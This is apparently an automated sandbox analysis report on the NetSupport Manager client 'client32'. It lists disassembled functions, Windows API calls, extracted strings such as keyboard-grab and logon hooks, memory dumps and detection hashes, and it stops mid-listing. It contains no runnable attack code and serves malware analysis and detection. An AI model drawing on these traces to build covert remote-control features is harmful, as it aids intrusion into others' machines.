                                                                                                                                                                                                    • CreateWindowExA.USER32(00000001,NSMWClass,02610820,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                                                                                                    • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                                                                                                    • API String ID: 1594747848-1114959992
                                                                                                                                                                                                    • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                                                                                                    Function 1102C850 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,24DE4E77), ref: 1102CA84
                                                                                                                                                                                                    • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                                                    • API String ID: 83693535-2077998243
                                                                                                                                                                                                    • Opcode ID: d7bfc1230df4fb0b39081723e2fa8acaf563a561e877368a5726300d8e723dbb
                                                                                                                                                                                                    • Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7bfc1230df4fb0b39081723e2fa8acaf563a561e877368a5726300d8e723dbb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51
                                                                                                                                                                                                    Function 11026810 Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 174sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _strtok.LIBCMT ref: 11026896
                                                                                                                                                                                                    • _strtok.LIBCMT ref: 110268D0
                                                                                                                                                                                                    • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strtok$Sleep
                                                                                                                                                                                                    • String ID: *max_sessions$@r$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                                                                                    • API String ID: 2009458258-3431504079
                                                                                                                                                                                                    • Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                                                                                    • Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
                                                                                                                                                                                                    Function 687E1D3F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __set_flsgetvalue.MSVCR100(687E1DE0,00000008,687E1E16,00000001,?), ref: 687E1D6A
                                                                                                                                                                                                      • Part of subcall function 687E0341: TlsGetValue.KERNEL32(?,687E0713), ref: 687E034A
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(687E1DE0,00000008,687E1E16,00000001,?), ref: 687E1D7B
                                                                                                                                                                                                    • _calloc_crt.MSVCR100(00000001,00000214), ref: 687E1D8E
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000), ref: 687E1DAC
                                                                                                                                                                                                    • _initptd.MSVCR100(00000000,00000000), ref: 687E1DBE
                                                                                                                                                                                                      • Part of subcall function 687E1E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,687E1F38,00000008,688075E9,00000000,00000000), ref: 687E1EAC
                                                                                                                                                                                                      • Part of subcall function 687E1E9B: _lock.MSVCR100(0000000D), ref: 687E1EE0
                                                                                                                                                                                                      • Part of subcall function 687E1E9B: InterlockedIncrement.KERNEL32(?), ref: 687E1EED
                                                                                                                                                                                                      • Part of subcall function 687E1E9B: _lock.MSVCR100(0000000C), ref: 687E1F01
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 687E1DC5
                                                                                                                                                                                                    • __freeptd.LIBCMT ref: 687E2971
                                                                                                                                                                                                    • __heap_init.LIBCMT ref: 687EB8B1
                                                                                                                                                                                                    • GetCommandLineA.KERNEL32(687E1DE0,00000008,687E1E16,00000001,?), ref: 687EB8E2
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 687EB8ED
                                                                                                                                                                                                    • __ioterm.LIBCMT ref: 687F7B7E
                                                                                                                                                                                                    • free.MSVCR100(00000000), ref: 68807485
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2121586863-0
                                                                                                                                                                                                    • Opcode ID: 0c9c981bd24189ebf4bfc0c2e1169a0c0b6679ad87c4d2ec4b890586b33d8893
                                                                                                                                                                                                    • Instruction ID: c565353fb3ec03c29bf6ec110e6dccc42e152edcce28fd538532ed449f422d66
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c9c981bd24189ebf4bfc0c2e1169a0c0b6679ad87c4d2ec4b890586b33d8893
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6231BE79488741DADB117BBE8B4E53D3AB4EF4739ABE00936F469D9140DF3180428AB2
                                                                                                                                                                                                    Function 1112FC80 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1112FCF0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1112FD21
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1112FD3C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountTick$FolderPathwsprintf
                                                                                                                                                                                                    • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                                                                                                    • API String ID: 1170620360-4157686185
                                                                                                                                                                                                    • Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                                                                                    • Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92
                                                                                                                                                                                                    Function 11030438 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                      • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                      • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00728D58,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    • _sprintf.LIBCMT ref: 1103078D
                                                                                                                                                                                                    • _setlocale.LIBCMT ref: 11030797
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
                                                                                                                                                                                                    • String ID: .%d$Error %s unloading audiocap dll$pcicl32
                                                                                                                                                                                                    • API String ID: 3430446287-3899566344
                                                                                                                                                                                                    • Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                                                                                                    • Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
                                                                                                                                                                                                    Function 11141710 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1114179D
                                                                                                                                                                                                      • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 1114186A
                                                                                                                                                                                                      • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11141906
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                                                                    • API String ID: 3299820421-2117887902
                                                                                                                                                                                                    • Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                                                                                    • Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
                                                                                                                                                                                                    Function 68598D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,685A67B5), ref: 68598D6B
                                                                                                                                                                                                      • Part of subcall function 68594F70: LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 68598DCB
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 68598DD8
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 68598EBF
                                                                                                                                                                                                      • Part of subcall function 68594FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
                                                                                                                                                                                                      • Part of subcall function 68594FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
                                                                                                                                                                                                      • Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
                                                                                                                                                                                                      • Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
